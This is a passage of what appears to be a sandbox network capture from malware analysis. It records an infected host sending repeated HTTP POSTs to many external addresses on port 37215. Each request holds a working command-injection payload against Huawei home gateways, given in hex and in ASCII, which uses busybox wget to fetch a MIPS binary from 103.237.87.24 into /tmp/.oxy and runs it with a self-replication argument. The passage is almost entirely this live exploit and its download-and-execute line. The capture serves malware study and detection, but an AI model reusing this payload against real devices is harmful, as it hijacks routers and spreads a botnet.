20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1882192.168.2.1358498197.155.224.16737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.549288988 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1883192.168.2.1350644157.196.24.6837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.549297094 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1884192.168.2.135341641.143.230.19837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.549359083 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1885192.168.2.133568641.78.77.7937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.549361944 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1886192.168.2.1341722157.5.241.12937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.549361944 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1887192.168.2.13397425.135.194.1337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.549685001 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1888192.168.2.1334938197.150.176.25337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.549834967 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1889192.168.2.1352748197.192.148.22637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.549876928 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1890192.168.2.1335730197.179.18.9037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.549906015 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1891192.168.2.134240641.111.154.23637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.550455093 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1892192.168.2.1347488197.112.240.637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.550513983 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
